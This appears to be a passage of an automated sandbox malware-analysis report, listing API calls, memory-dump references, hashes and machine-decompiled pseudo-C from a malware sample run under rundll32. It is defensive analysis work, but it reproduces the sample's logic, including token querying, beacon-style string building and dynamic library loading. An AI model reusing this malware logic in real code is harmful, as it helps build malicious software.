                                                          • lstrlenW.KERNEL32(004F0053,?,74B05520,00000008,04AF935C,?,04678D93,004F0053,04AF935C,?,?,?,?,?,?,0467523E), ref: 046745D6
                                                          • lstrlenW.KERNEL32(04678D93,?,04678D93,004F0053,04AF935C,?,?,?,?,?,?,0467523E), ref: 046745DD
                                                            • Part of subcall function 0467A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04675595), ref: 0467A72B
                                                          • memcpy.NTDLL(00000000,004F0053,74B069A0,?,?,04678D93,004F0053,04AF935C,?,?,?,?,?,?,0467523E), ref: 046745FD
                                                          • memcpy.NTDLL(74B069A0,04678D93,00000002,00000000,004F0053,74B069A0,?,?,04678D93,004F0053,04AF935C), ref: 04674610
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: lstrlenmemcpy$AllocateHeap
                                                          • String ID:
                                                          • API String ID: 2411391700-0
                                                          • Opcode ID: 87dba54637b2f9b368697f4bfd7f3466cf8bcceb4535d4c2805c36cb1426a5d3
                                                          • Instruction ID: 8625cb61a805b00b979a18e7c54ce320a5662c984058c66fb15e90240142983e
                                                          • Opcode Fuzzy Hash: 87dba54637b2f9b368697f4bfd7f3466cf8bcceb4535d4c2805c36cb1426a5d3
                                                          • Instruction Fuzzy Hash: DCF0F976900119BBDF11EFA9CC84C9F7BACEF492687154066EA04D7201FB35EA149BA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0467361A, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(04AF9A78,00000000,00000000,7742C740,046720ED,00000000), ref: 0467362A
                                                          • lstrlen.KERNEL32(?), ref: 04673632
                                                            • Part of subcall function 0467A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04675595), ref: 0467A72B
                                                          • lstrcpy.KERNEL32(00000000,04AF9A78), ref: 04673646
                                                          • lstrcat.KERNEL32(00000000,?), ref: 04673651
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                          • String ID:
                                                          • API String ID: 74227042-0
                                                          • Opcode ID: f951adf69a7d38f0b58d31e442a030d49b31a90ec70e6f2f773cab1fa33e05f7
                                                          • Instruction ID: 01d33ea8c5c9175a756ca91c86abd8ba0e8a73cfba52fba0926ba488822b5139
                                                          • Opcode Fuzzy Hash: f951adf69a7d38f0b58d31e442a030d49b31a90ec70e6f2f773cab1fa33e05f7
                                                          • Instruction Fuzzy Hash: 35E01273501621A78715ABE4AC48C6FBBADEF99651704041BF700D3210E72A9D059BE5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Analysis Process: rundll32.exe PID: 1752 Parent PID: 1112 rundll32.exeCOMMON

                                                          Executed Functions

                                                          Function 02B95A27, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 38%
                                                          			E02B95A27(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E02B9A71F(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E02B9A734(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                                                          0x02b95a34
                                                          0x02b95a35
                                                          0x02b95a36
                                                          0x02b95a37
                                                          0x02b95a38
                                                          0x02b95a3c
                                                          0x02b95a43
                                                          0x02b95a52
                                                          0x02b95a55
                                                          0x02b95a58
                                                          0x02b95a5f
                                                          0x02b95a62
                                                          0x02b95a65
                                                          0x02b95a68
                                                          0x02b95a6b
                                                          0x02b95a76
                                                          0x02b95a78
                                                          0x02b95a81
                                                          0x02b95a89
                                                          0x02b95a8b
                                                          0x02b95a9d
                                                          0x02b95aa7
                                                          0x02b95aab
                                                          0x02b95aba
                                                          0x02b95abe
                                                          0x02b95ac7
                                                          0x02b95acf
                                                          0x02b95acf
                                                          0x02b95ad1
                                                          0x02b95ad1
                                                          0x02b95ad9
                                                          0x02b95adf
                                                          0x02b95ae3
                                                          0x02b95ae3
                                                          0x02b95aee

                                                          APIs
                                                          • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 02B95A6E
                                                          • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 02B95A81
                                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 02B95A9D
                                                            • Part of subcall function 02B9A71F: RtlAllocateHeap.NTDLL(00000000,00000000,02B95595), ref: 02B9A72B
                                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 02B95ABA
                                                          • memcpy.NTDLL(00000000,00000000,0000001C), ref: 02B95AC7
                                                          • NtClose.NTDLL(?), ref: 02B95AD9
                                                          • NtClose.NTDLL(00000000), ref: 02B95AE3
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                          • String ID:
                                                          • API String ID: 2575439697-0
                                                          • Opcode ID: 179600a991d482f1bb92ea0d361407a94d72853553e6f86c36cb121b4b3ef93a
                                                          • Instruction ID: 635c5fae104959a36c5bf643840d18210bc044846df52dc1a402e3de8936b069
                                                          • Opcode Fuzzy Hash: 179600a991d482f1bb92ea0d361407a94d72853553e6f86c36cb121b4b3ef93a
                                                          • Instruction Fuzzy Hash: 262116B2940218BBDF11AFA5DC85ADEBFBDEF08780F108062F905E6110D7719A549BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02B94AB6, Relevance: 33.2, APIs: 22, Instructions: 244memorystringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 74%
                                                          			E02B94AB6(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t67;
				intOrPtr _t68;
				int _t71;
				void* _t72;
				void* _t73;
				void* _t75;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr* _t88;
				void* _t94;
				intOrPtr _t100;
				signed int _t104;
				char** _t106;
				int _t109;
				signed int _t111;
				intOrPtr* _t112;
				intOrPtr* _t114;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr _t121;
				intOrPtr _t126;
				int _t130;
				CHAR* _t132;
				intOrPtr _t133;
				void* _t134;
				void* _t143;
				int _t144;
				void* _t145;
				intOrPtr _t146;
				void* _t148;
				long _t152;
				intOrPtr* _t153;
				intOrPtr* _t154;
				intOrPtr* _t157;
				void* _t158;
				void* _t160;

				_t143 = __edx;
				_t134 = __ecx;
				_t59 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t59 = GetTickCount();
				}
				_t60 =  *0x2b9d018; // 0xf1c1aee9
				asm("bswap eax");
				_t61 =  *0x2b9d014; // 0x3a87c8cd
				_t132 = _a16;
				asm("bswap eax");
				_t62 =  *0x2b9d010; // 0xd8d2f808
				asm("bswap eax");
				_t63 = E02B9D00C; // 0xeec43f25
				asm("bswap eax");
				_t64 =  *0x2b9d2a8; // 0x3e1a5a8
				_t3 = _t64 + 0x2b9e633; // 0x74666f73
				_t144 = wsprintfA(_t132, _t3, 3, 0x3d15e, _t63, _t62, _t61, _t60,  *0x2b9d02c,  *0x2b9d004, _t59);
				_t67 = E02B956CD();
				_t68 =  *0x2b9d2a8; // 0x3e1a5a8
				_t4 = _t68 + 0x2b9e673; // 0x74707526
				_t71 = wsprintfA(_t144 + _t132, _t4, _t67);
				_t160 = _t158 + 0x38;
				_t145 = _t144 + _t71; // executed
				_t72 = E02B958DB(_t134); // executed
				_t133 = __imp__;
				_v8 = _t72;
				if(_t72 != 0) {
					_t126 =  *0x2b9d2a8; // 0x3e1a5a8
					_t7 = _t126 + 0x2b9e8d4; // 0x736e6426
					_t130 = wsprintfA(_a16 + _t145, _t7, _t72);
					_t160 = _t160 + 0xc;
					_t145 = _t145 + _t130;
					HeapFree( *0x2b9d238, 0, _v8);
				}
				_t73 = E02B9A199();
				_v8 = _t73;
				if(_t73 != 0) {
					_t121 =  *0x2b9d2a8; // 0x3e1a5a8
					_t11 = _t121 + 0x2b9e8dc; // 0x6f687726
					wsprintfA(_t145 + _a16, _t11, _t73);
					_t160 = _t160 + 0xc;
					HeapFree( *0x2b9d238, 0, _v8);
				}
				_t146 =  *0x2b9d32c; // 0x69b95b0
				_t75 = E02B94622(0x2b9d00a, _t146 + 4);
				_t152 = 0;
				_v20 = _t75;
				if(_t75 == 0) {
					L26:
					RtlFreeHeap( *0x2b9d238, _t152, _a16); // executed
					return _v12;
				} else {
					_t78 = RtlAllocateHeap( *0x2b9d238, 0, 0x800);
					_v8 = _t78;
					if(_t78 == 0) {
						L25:
						HeapFree( *0x2b9d238, _t152, _v20);
						goto L26;
					}
					E02B9518F(GetTickCount());
					_t82 =  *0x2b9d32c; // 0x69b95b0
					__imp__(_t82 + 0x40);
					asm("lock xadd [eax], ecx");
					_t86 =  *0x2b9d32c; // 0x69b95b0
					__imp__(_t86 + 0x40);
					_t88 =  *0x2b9d32c; // 0x69b95b0
					_t148 = E02B91BB6(1, _t143, _a16,  *_t88);
					_v28 = _t148;
					asm("lock xadd [eax], ecx");
					if(_t148 == 0) {
						L24:
						HeapFree( *0x2b9d238, _t152, _v8);
						goto L25;
					}
					StrTrimA(_t148, 0x2b9c28c);
					_push(_t148);
					_t94 = E02B9361A();
					_v16 = _t94;
					if(_t94 == 0) {
						L23:
						HeapFree( *0x2b9d238, _t152, _t148);
						goto L24;
					}
					_t153 = __imp__;
					 *_t153(_t148, _a4);
					 *_t153(_v8, _v20);
					_t154 = __imp__;
					 *_t154(_v8, _v16);
					_t100 = E02B99070( *_t154(_v8, _t148), _v8);
					_a4 = _t100;
					if(_t100 == 0) {
						_v12 = 8;
						L21:
						E02B96761();
						L22:
						HeapFree( *0x2b9d238, 0, _v16);
						_t152 = 0;
						goto L23;
					}
					_t104 = E02B969B4(_t133, 0xffffffffffffffff, _t148,  &_v24); // executed
					_v12 = _t104;
					if(_t104 == 0) {
						_t157 = _v24;
						_t111 = E02B9391F(_t157, _a4, _a8, _a12); // executed
						_v12 = _t111;
						_t112 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t112 + 0x80))(_t112);
						_t114 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t114 + 8))(_t114);
						_t116 =  *((intOrPtr*)(_t157 + 4));
						 *((intOrPtr*)( *_t116 + 8))(_t116);
						_t118 =  *_t157;
						 *((intOrPtr*)( *_t118 + 8))(_t118);
						E02B9A734(_t157);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t106 = _a8;
							if(_t106 != 0) {
								_t149 =  *_t106;
								_t155 =  *_a12;
								wcstombs( *_t106,  *_t106,  *_a12);
								_t109 = E02B95800(_t149, _t149, _t155 >> 1);
								_t148 = _v28;
								 *_a12 = _t109;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E02B9A734(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}






















































                                                          0x02b94ab6
                                                          0x02b94ab6
                                                          0x02b94ab6
                                                          0x02b94abf
                                                          0x02b94ac8
                                                          0x02b94aca
                                                          0x02b94aca
                                                          0x02b94ad7
                                                          0x02b94ae2
                                                          0x02b94ae5
                                                          0x02b94aea
                                                          0x02b94af3
                                                          0x02b94af6
                                                          0x02b94afb
                                                          0x02b94afe
                                                          0x02b94b03
                                                          0x02b94b06
                                                          0x02b94b12
                                                          0x02b94b1f
                                                          0x02b94b21
                                                          0x02b94b27
                                                          0x02b94b2c
                                                          0x02b94b37
                                                          0x02b94b39
                                                          0x02b94b3c
                                                          0x02b94b3e
                                                          0x02b94b43
                                                          0x02b94b49
                                                          0x02b94b4e
                                                          0x02b94b51
                                                          0x02b94b56
                                                          0x02b94b63
                                                          0x02b94b65
                                                          0x02b94b6b
                                                          0x02b94b75
                                                          0x02b94b75
                                                          0x02b94b77
                                                          0x02b94b7c
                                                          0x02b94b81
                                                          0x02b94b84
                                                          0x02b94b89
                                                          0x02b94b96
                                                          0x02b94b98
                                                          0x02b94ba6
                                                          0x02b94ba6
                                                          0x02b94ba8
                                                          0x02b94bb6
                                                          0x02b94bbb
                                                          0x02b94bbd
                                                          0x02b94bc2
                                                          0x02b94d83
                                                          0x02b94d8d
                                                          0x02b94d96
                                                          0x02b94bc8
                                                          0x02b94bd4
                                                          0x02b94bda
                                                          0x02b94bdf
                                                          0x02b94d77
                                                          0x02b94d81
                                                          0x00000000
                                                          0x02b94d81
                                                          0x02b94beb
                                                          0x02b94bf0
                                                          0x02b94bf9
                                                          0x02b94c0a
                                                          0x02b94c0e
                                                          0x02b94c17
                                                          0x02b94c1d
                                                          0x02b94c2c
                                                          0x02b94c33
                                                          0x02b94c3c
                                                          0x02b94c42
                                                          0x02b94d6b
                                                          0x02b94d75
                                                          0x00000000
                                                          0x02b94d75
                                                          0x02b94c4e
                                                          0x02b94c54
                                                          0x02b94c55
                                                          0x02b94c5a
                                                          0x02b94c5f
                                                          0x02b94d61
                                                          0x02b94d69
                                                          0x00000000
                                                          0x02b94d69
                                                          0x02b94c68
                                                          0x02b94c6f
                                                          0x02b94c77
                                                          0x02b94c7c
                                                          0x02b94c85
                                                          0x02b94c90
                                                          0x02b94c95
                                                          0x02b94c9a
                                                          0x02b94d99
                                                          0x02b94d4d
                                                          0x02b94d4d
                                                          0x02b94d52
                                                          0x02b94d5d
                                                          0x02b94d5f
                                                          0x00000000
                                                          0x02b94d5f
                                                          0x02b94ca4
                                                          0x02b94ca9
                                                          0x02b94cae
                                                          0x02b94cb3
                                                          0x02b94cbe
                                                          0x02b94cc3
                                                          0x02b94cc6
                                                          0x02b94ccc
                                                          0x02b94cd2
                                                          0x02b94cd8
                                                          0x02b94cdb
                                                          0x02b94ce1
                                                          0x02b94ce4
                                                          0x02b94ce9
                                                          0x02b94ced
                                                          0x02b94ced
                                                          0x02b94cf9
                                                          0x02b94d05
                                                          0x02b94d09
                                                          0x02b94d0b
                                                          0x02b94d10
                                                          0x02b94d12
                                                          0x02b94d17
                                                          0x02b94d1c
                                                          0x02b94d29
                                                          0x02b94d31
                                                          0x02b94d34
                                                          0x02b94d34
                                                          0x02b94d10
                                                          0x00000000
                                                          0x02b94cfb
                                                          0x02b94cff
                                                          0x02b94d36
                                                          0x02b94d39
                                                          0x02b94d42
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x02b94d42
                                                          0x02b94d01
                                                          0x00000000
                                                          0x02b94d01
                                                          0x02b94cf9

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 02B94ACA
                                                          • wsprintfA.USER32 ref: 02B94B1A
                                                          • wsprintfA.USER32 ref: 02B94B37
                                                          • wsprintfA.USER32 ref: 02B94B63
                                                          • HeapFree.KERNEL32(00000000,?), ref: 02B94B75
                                                          • wsprintfA.USER32 ref: 02B94B96
                                                          • HeapFree.KERNEL32(00000000,?), ref: 02B94BA6
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02B94BD4
                                                          • GetTickCount.KERNEL32 ref: 02B94BE5
                                                          • RtlEnterCriticalSection.NTDLL(069B9570), ref: 02B94BF9
                                                          • RtlLeaveCriticalSection.NTDLL(069B9570), ref: 02B94C17
                                                            • Part of subcall function 02B91BB6: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,02B920C2,?,069B95B0), ref: 02B91BE1
                                                            • Part of subcall function 02B91BB6: lstrlen.KERNEL32(?,?,?,02B920C2,?,069B95B0), ref: 02B91BE9
                                                            • Part of subcall function 02B91BB6: strcpy.NTDLL ref: 02B91C00
                                                            • Part of subcall function 02B91BB6: lstrcat.KERNEL32(00000000,?), ref: 02B91C0B
                                                            • Part of subcall function 02B91BB6: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,02B920C2,?,069B95B0), ref: 02B91C28
                                                          • StrTrimA.SHLWAPI(00000000,02B9C28C,?,069B95B0), ref: 02B94C4E
                                                            • Part of subcall function 02B9361A: lstrlen.KERNEL32(069B9A78,00000000,00000000,7742C740,02B920ED,00000000), ref: 02B9362A
                                                            • Part of subcall function 02B9361A: lstrlen.KERNEL32(?), ref: 02B93632
                                                            • Part of subcall function 02B9361A: lstrcpy.KERNEL32(00000000,069B9A78), ref: 02B93646
                                                            • Part of subcall function 02B9361A: lstrcat.KERNEL32(00000000,?), ref: 02B93651
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 02B94C6F
                                                          • lstrcpy.KERNEL32(?,?), ref: 02B94C77
                                                          • lstrcat.KERNEL32(?,?), ref: 02B94C85
                                                          • lstrcat.KERNEL32(?,00000000), ref: 02B94C8B
                                                            • Part of subcall function 02B99070: lstrlen.KERNEL32(?,00000000,069B9A98,00000000,02B98808,069B9C76,?,?,?,?,?,63699BC3,00000005,02B9D00C), ref: 02B99077
                                                            • Part of subcall function 02B99070: mbstowcs.NTDLL ref: 02B990A0
                                                            • Part of subcall function 02B99070: memset.NTDLL ref: 02B990B2
                                                          • wcstombs.NTDLL ref: 02B94D1C
                                                            • Part of subcall function 02B9391F: SysAllocString.OLEAUT32(?), ref: 02B9395A
                                                            • Part of subcall function 02B9391F: IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 02B939DD
                                                            • Part of subcall function 02B9A734: HeapFree.KERNEL32(00000000,00000000,02B95637,00000000,?,?,00000000), ref: 02B9A740
                                                          • HeapFree.KERNEL32(00000000,?,?), ref: 02B94D5D
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02B94D69
                                                          • HeapFree.KERNEL32(00000000,?,?,069B95B0), ref: 02B94D75
                                                          • HeapFree.KERNEL32(00000000,?), ref: 02B94D81
                                                          • RtlFreeHeap.NTDLL(00000000,?), ref: 02B94D8D
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
                                                          • String ID:
                                                          • API String ID: 603507560-0
                                                          • Opcode ID: 9786ed7d80e3e5ef82d25956bb70b6b7942cfaa40930d2fb34544464fb3b200f
                                                          • Instruction ID: f3a23d36bf03fba571adefa54ecd77cb156c8e57433da8f0e3b0502e9f6414e7
                                                          • Opcode Fuzzy Hash: 9786ed7d80e3e5ef82d25956bb70b6b7942cfaa40930d2fb34544464fb3b200f
                                                          • Instruction Fuzzy Hash: 49917971940109AFCF11EFA9DD88AAEBBB9EF08390F1048A5F504E7260CB31D961DF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02B9AC55, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209libraryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 51%
                                                          			E02B9AC55(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				struct HINSTANCE__* _t99;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x2b90000;
				_t115 = _t139[3] + 0x2b90000;
				_t131 = _t139[4] + 0x2b90000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x2b90000;
				_v16 = _t139[5] + 0x2b90000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x2b90002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x2b9d1a0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x2b9d1a0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x2b9d1a0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x2b9d19c; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x2b9d1a0; // 0x0
					if(_t98 == 0) {
						L9:
						_t99 = LoadLibraryA(_v60); // executed
						_t138 = _t99;
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x2b9d198; // 0x0
										 *_t102 = _t125;
										 *0x2b9d198 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x2b9d19c; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}


































                                                          0x02b9ac64
                                                          0x02b9ac7a
                                                          0x02b9ac80
                                                          0x02b9ac82
                                                          0x02b9ac87
                                                          0x02b9ac8d
                                                          0x02b9ac92
                                                          0x02b9ac95
                                                          0x02b9aca3
                                                          0x02b9acaa
                                                          0x02b9acad
                                                          0x02b9acb0
                                                          0x02b9acb1
                                                          0x02b9acb4
                                                          0x02b9acb7
                                                          0x02b9acba
                                                          0x02b9acbf
                                                          0x02b9acce
                                                          0x00000000
                                                          0x02b9acd4
                                                          0x02b9acde
                                                          0x02b9ace8
                                                          0x02b9aced
                                                          0x02b9acef
                                                          0x02b9acf9
                                                          0x02b9acfc
                                                          0x02b9acff
                                                          0x02b9ad05
                                                          0x02b9ad07
                                                          0x02b9ad07
                                                          0x02b9ad0a
                                                          0x02b9ad0d
                                                          0x02b9ad12
                                                          0x02b9ad16
                                                          0x02b9ad29
                                                          0x02b9ad2b
                                                          0x02b9add3
                                                          0x02b9add3
                                                          0x02b9adda
                                                          0x02b9addd
                                                          0x02b9ade7
                                                          0x02b9ade7
                                                          0x02b9adeb
                                                          0x02b9ae69
                                                          0x02b9ae6c
                                                          0x02b9ae6e
                                                          0x02b9ae6e
                                                          0x02b9ae75
                                                          0x02b9ae77
                                                          0x02b9ae81
                                                          0x02b9ae84
                                                          0x02b9ae87
                                                          0x02b9ae87
                                                          0x00000000
                                                          0x02b9aded
                                                          0x02b9adf0
                                                          0x02b9ae1e
                                                          0x02b9ae28
                                                          0x02b9ae2c
                                                          0x02b9ae34
                                                          0x02b9ae37
                                                          0x02b9ae3e
                                                          0x02b9ae48
                                                          0x02b9ae48
                                                          0x02b9ae4c
                                                          0x02b9ae51
                                                          0x02b9ae60
                                                          0x02b9ae66
                                                          0x02b9ae66
                                                          0x02b9ae4c
                                                          0x00000000
                                                          0x02b9adf7
                                                          0x02b9adfa
                                                          0x02b9ae02
                                                          0x02b9ae17
                                                          0x02b9ae1c
                                                          0x00000000
                                                          0x00000000
                                                          0x02b9ae1c
                                                          0x00000000
                                                          0x02b9ae02
                                                          0x02b9adf0
                                                          0x02b9adeb
                                                          0x02b9ad31
                                                          0x02b9ad38
                                                          0x02b9ad48
                                                          0x02b9ad4b
                                                          0x02b9ad51
                                                          0x02b9ad55
                                                          0x02b9ad98
                                                          0x02b9ada4
                                                          0x02b9adcd
                                                          0x02b9ada6
                                                          0x02b9adaa
                                                          0x02b9adb0
                                                          0x02b9adb8
                                                          0x02b9adba
                                                          0x02b9adbd
                                                          0x02b9adc3
                                                          0x02b9adc5
                                                          0x02b9adc5
                                                          0x02b9adb8
                                                          0x02b9adaa
                                                          0x00000000
                                                          0x02b9ada4
                                                          0x02b9ad5d
                                                          0x02b9ad60
                                                          0x02b9ad67
                                                          0x02b9ad77
                                                          0x02b9ad7a
                                                          0x02b9ad8a
                                                          0x00000000
                                                          0x02b9ad90
                                                          0x02b9ad71
                                                          0x02b9ad75
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x02b9ad75
                                                          0x02b9ad42
                                                          0x02b9ad46
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x02b9ad46
                                                          0x02b9ad1f
                                                          0x02b9ad23
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000

                                                          APIs
                                                          • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 02B9ACCE
                                                          • LoadLibraryA.KERNELBASE(?), ref: 02B9AD4B
                                                          • GetLastError.KERNEL32 ref: 02B9AD57
                                                          • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 02B9AD8A
                                                          Strings
                                                          Memory Dump Source
